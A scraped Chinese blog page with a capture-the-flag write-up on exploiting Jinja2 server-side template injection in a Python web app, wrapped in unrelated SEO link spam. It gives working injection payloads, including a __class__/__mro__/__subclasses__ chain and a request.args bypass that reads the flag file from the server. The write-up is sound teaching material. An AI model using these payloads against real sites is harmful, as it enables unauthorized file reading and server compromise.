当前位置: 首页 > news >正文

成都专业网站建设张家口建设局网站

成都专业网站建设,张家口建设局网站,提供网站建设服务平台,宜昌市上海中学官网题目 访问题目场景 某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 然后结合图片我们知道,这个网址是python写的&#xff0…

题目

访问题目场景

 

某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)

然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入

SSTI模板注入

SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。

sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。

SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jade velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。

现在网上提起的比较多的是Python的网站。

然后我们就可以用常规的注入方法去尝试一下

/{{7*7}}

 现在我们确认了,这确实存在模板注入

常规的用一些魔术方法去注入测试

/{{''.__class__.__mro[2]__.__subclasses__()}}

 

发现行不通,那我们就测试别的方法

/{{config}}

The requested URL /<Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': None, 'EXPLAIN_TEMPLATE_LOADING': False, 'MAX_CONTENT_LENGTH': None, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}> was not found on this server.

 尝试request

/{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

可以发现存在File方法,就证明我们能读取信息

/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

 

 

而flag的位置是在下图的位置(使用注入之后再右键检查就能发现了)

 

http://www.sczhlp.com/news/116848/

相关文章:

  • 亚马逊网站开发者平台网站建设攸县
  • 缺失的第一个正数-leetcode
  • hbase的安装应用
  • 如何在后端优雅地生成并传递动态错误提示?
  • 网站专项审批查询游戏工作室加盟需要什么条件
  • 百度的网站名大连专业模板网站制作
  • 网站用的横幅广告怎么做友情链接你会回来感谢我
  • 网站建设服务公司有用吗广州市研发网站建设怎么样
  • 在线购物网站建设建网站找哪个平台好呢
  • 网站建设jiagefor和wordpress
  • 怎么做物物交换网站哪个网站可以查询即将到期的域名
  • 怎样做diy家具网站协会网站建设的优势
  • 无锡品牌网站建设网站网站建设管理人员工作职责
  • 上海做网站站优云一一十六福州百度开户多少钱
  • 网站栏目规划叫什么深圳整合营销
  • 重庆网站推广平台中国洛阳网
  • 成都记者留言网站西安做网站要多少钱
  • 什么网站可以做相册公司可以备案几个网站
  • 04_Redis凭啥这么牛:核心特性剖析
  • WPF包
  • 务川自治县建设局网站企业网站源码百度网盘下载
  • 网站平台有哪些营销型网站图片
  • 网站开发 荣誉资质娃哈哈网络营销模式
  • 建个网站 费用网站整合营销
  • 佰联轴承网做的网站河南网站推广优化多少钱
  • 怎样做网站后台游戏推广好做吗
  • 网站连接跳转怎么做天津建站服务
  • 安徽龙山建设网站美食城网站建设策划书
  • 有没有好网站推荐阿里国际站韩语网站怎么做
  • dtcms网站开发wordpress主题网